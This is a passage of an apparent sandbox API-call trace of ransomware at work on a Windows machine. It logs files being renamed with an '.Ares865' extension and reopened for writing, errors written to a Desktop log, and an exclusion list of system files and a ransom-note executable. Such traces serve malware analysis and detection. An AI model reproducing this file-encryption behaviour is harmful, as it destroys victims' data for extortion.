lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32632) returned 1 [0097.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing" [0097.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat.Ares865") returned 135 [0097.064] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat.ares865"), dwFlags=0x1) returned 1 [0097.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\AntiPhishing\\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\antiphishing\\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=294804) returned 1 [0097.084] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.Word", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.Word" [0097.084] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.MSO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.MSO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.MSO" [0097.085] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5" [0097.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865") returned 101 [0097.085] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.088] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.091] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 99 [0097.091] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0097.091] GetLastError () returned 0x20 [0097.091] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 121 [0097.091] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 121 [0097.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0097.091] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5b2a [0097.091] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x79, lpOverlapped=0x0) returned 1 [0097.092] CloseHandle (hObject=0x118) returned 1 [0097.092] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0097.092] CloseHandle (hObject=0x0) returned 0 [0097.092] CloseHandle (hObject=0x0) returned 0 [0097.092] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2=".") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="..") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="windows") returned -1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="bootmgr") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="temp") returned -1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="pagefile.sys") returned -1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="boot") returned 1 [0097.092] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ids.txt") returned 1 [0097.093] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ntuser.dat") returned -1 [0097.093] lstrcmpiW (lpString1="MM5O9XQS", lpString2="perflogs") returned -1 [0097.093] lstrcmpiW (lpString1="MM5O9XQS", lpString2="MSBuild") returned -1 [0097.093] lstrlenW (lpString="MM5O9XQS") returned 8 [0097.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat") returned 91 [0097.093] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0097.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0097.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f2fc8 [0097.093] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0097.093] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d6b9300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6b9300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2=".") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="..") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="windows") returned -1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="bootmgr") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="temp") returned -1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="pagefile.sys") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="boot") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ids.txt") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ntuser.dat") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="perflogs") returned 1 [0097.093] lstrcmpiW (lpString1="PMMR5K9K", lpString2="MSBuild") returned 1 [0097.093] lstrlenW (lpString="PMMR5K9K") returned 8 [0097.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 90 [0097.093] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0097.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0097.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f3088 [0097.093] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0097.093] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d6b9300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6b9300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0097.093] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0097.093] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0097.093] lstrcmpiW (lpString1="RIJUQL1C", lpString2=".") returned 1 [0097.093] lstrcmpiW (lpString1="RIJUQL1C", lpString2="..") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="windows") returned -1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="bootmgr") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="temp") returned -1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="pagefile.sys") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="boot") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ids.txt") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ntuser.dat") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="perflogs") returned 1 [0097.094] lstrcmpiW (lpString1="RIJUQL1C", lpString2="MSBuild") returned 1 [0097.094] lstrlenW (lpString="RIJUQL1C") returned 8 [0097.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 90 [0097.094] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0097.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0097.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f3148 [0097.094] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0097.094] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d6b9300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6b9300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2=".") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="..") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="windows") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="bootmgr") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="temp") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="pagefile.sys") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="boot") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="ids.txt") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="ntuser.dat") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="perflogs") returned 1 [0097.094] lstrcmpiW (lpString1="X9OHK109", lpString2="MSBuild") returned 1 [0097.094] lstrlenW (lpString="X9OHK109") returned 8 [0097.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 90 [0097.094] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0097.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0097.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f3208 [0097.095] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0097.095] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d6b9300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6b9300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0097.095] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0097.095] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0097.095] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0097.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865") returned 110 [0097.095] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.100] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0097.100] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865") returned 110 [0097.101] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.103] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.107] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0097.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865") returned 110 [0097.107] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.109] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.115] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0097.115] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865") returned 110 [0097.115] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0097.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0097.120] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla" [0097.120] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates" [0097.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B" [0097.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates" [0097.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" [0097.122] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.Ares865") returned 109 [0097.122] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 